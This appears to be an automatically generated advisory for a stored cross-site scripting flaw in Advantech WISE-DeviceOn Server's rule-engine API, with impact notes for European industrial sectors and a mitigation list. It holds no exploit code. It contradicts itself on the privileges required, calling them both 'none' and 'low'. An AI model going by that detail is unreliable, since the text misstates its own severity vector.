CVE-2025-34265 is a stored cross-site scripting (XSS) vulnerability identified in Advantech Co., Ltd.'s WISE-DeviceOn Server, a platform used for managing IoT and industrial devices. The flaw exists in versions prior to 5.4 within the /rmm/v1/rule-engines REST API endpoint, where authenticated users can create or update rules for agents. Specifically, the vulnerability arises because the rule fields 'min', 'max', and 'unit' are stored and later rendered in the user interface without proper HTML sanitization or encoding. This improper neutralization of input (CWE-79) allows an attacker with authenticated access to inject malicious JavaScript code into these fields. When other users view or interact with the affected rules, the injected script executes in their browser context, potentially enabling session hijacking, credential theft, or unauthorized actions performed with the victim's privileges. The vulnerability requires the attacker to have at least limited privileges to create or modify rules and requires victim user interaction to trigger the malicious script. The CVSS 4.0 vector indicates network attack vector (AV:N), low attack complexity (AC:L), no privileges required for exploitation (PR:L - low privileges), user interaction required (UI:P), and low impact on confidentiality and integrity but no impact on availability. No known exploits have been reported in the wild as of the publication date. The vulnerability is classified as medium severity with a CVSS score of 5.1. Given the role of WISE-DeviceOn Server in industrial IoT device management, exploitation could lead to unauthorized control or information disclosure within operational technology environments.

For European organizations, especially those in manufacturing, energy, transportation, and critical infrastructure sectors that rely on Advantech WISE-DeviceOn Server for device management, this vulnerability poses a risk of session compromise and unauthorized actions within their device management platforms. Exploitation could allow attackers to execute arbitrary scripts in the context of legitimate users, potentially leading to theft of session tokens, unauthorized configuration changes, or lateral movement within the network. This could disrupt operational technology (OT) environments, cause data leakage, or facilitate further attacks against critical systems. The medium severity rating reflects that while the vulnerability requires authenticated access and user interaction, the impact on confidentiality and integrity is notable. Given the increasing integration of IoT and OT systems in European industries, the risk of operational disruption and data compromise is significant if the vulnerability is exploited.

1. Upgrade the WISE-DeviceOn Server to version 5.4 or later as soon as the vendor releases a patch addressing this vulnerability. 2. Until patching is possible, restrict rule creation and modification privileges strictly to trusted and trained personnel to reduce the risk of malicious input. 3. Implement web application firewall (WAF) rules to detect and block suspicious script injection attempts targeting the /rmm/v1/rule-engines endpoint. 4. Conduct regular security audits and input validation reviews on custom rules and configurations within the platform. 5. Educate users about the risks of interacting with untrusted or suspicious rules and encourage reporting of anomalies. 6. Monitor logs for unusual activities related to rule creation or modification. 7. Employ Content Security Policy (CSP) headers in the web application to limit the impact of potential XSS exploitation. 8. If feasible, isolate the management interface from general user networks to limit exposure.